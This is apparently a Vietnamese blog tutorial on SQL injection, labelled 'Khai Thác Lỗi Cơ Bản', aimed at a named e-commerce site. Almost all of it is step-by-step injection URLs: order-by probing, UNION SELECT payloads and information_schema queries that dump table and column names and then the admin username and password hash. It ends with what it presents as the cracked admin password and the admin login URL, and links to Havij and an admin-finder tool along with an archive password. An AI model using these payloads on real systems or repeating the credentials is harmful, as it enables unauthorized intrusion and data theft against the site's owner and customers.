Khai Thác Lỗi Cơ Bản
Victim: http://www.shophangkhuyenmai.com/
Bước 1: Check lỗi:
Thêm dấu ‘ sau đường link có dạng id=
http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421'
Nếu giao diện website có thay đổi. Chứng tỏ site bị lỗi.
Bước 2: Tìm số trường cột
http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421 order by 1-- - -> site bình thường
http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421 order by 15-- - -> Site vẫn bình thường
http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421 order by 16-- - -> Giao diện website thay đổi.
Số trường cột cần tìm là 15
Bước 3: Xác định vị trí trường cột bị lỗi
http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -
Chú ý là phải có dấu - trước 1421 thì mới xuất hiện ra các con số đẹp.
Chúng ta chú ý sẽ thấy xuất hiện các con số: 2,3,6,15,7. Đó chính là những vị trí bị lỗi mà chúng ta có thể khai thác tại đó. Ví dụ Soleil sẽ khai thác tại vị trí thứ 2.
Bước 4: Xuất ra tên các tables trong database
http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database()-- -
Thông tin về tên các table thu được:
tbl_config,tbl_content,tbl_content_category,tbl_member,tbl_order,tbl_order_detail,tbl_product,tbl_product_category,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor
Table chứa thông tin về username và password là tbl_user. ( Thường là nhưng table có chữ user). Vì vậy soleil sẽ khai thác ở table này.
Bước 5: Xuất ra tên các colums chứa username và password
http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_schema=database() and table_name=0x74626c5f75736572-- -
Lưu ý:
- 0x tạm hiểu là dung để nhận dạng khi sử dụng ở dạng mã hex
- 74626c5f75736572 là chữ tbl_user ở dạng hex.
- Link convert các ký tự sang mã hex:
http://string-functions.com/string-hex.aspx
Thông tin về tên columns thu được:
id,uid,pwd
Bước 6: Xuất ra thông tin về Username và Password
http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,unhex(hex(group_concat(uid,0x2f,pwd))),3,4,5,6,7,8,9,10,11,12,13,14,15 from tbl_user-- -
0x2f
Thông tin về username và password được mã hóa md5 thu được:
admin/679115597bf9f763506dcc9a8e9e8e82
Bước 7: Crack Password và tìm link admin:
- Có nhiều site để crack passwd, ví dụ:
http://md5cracker.org/
Hoặc sử dụng google để tìm kiếm
- Sử dụng các tool để tìm link admin: Havij, Web admin finder
Havij 1.5 free: http://www.mediafire.com/?bcrs460vcu1vy2q
Web admin finder 2.5 : http://www.mediafire.com/?ogoclxe83no1xzg
Pass dải nén: ducdung.08clc
Hoac. Tìm. Trên google app web admin finder vs havij ..vv
Thông tin Soleil thu được:
Link admin: http://www.shophangkhuyenmai.com/admin/
Username và password: admin / 961980dt
Đức dũng by tiên akira
ConversionConversion EmoticonEmoticon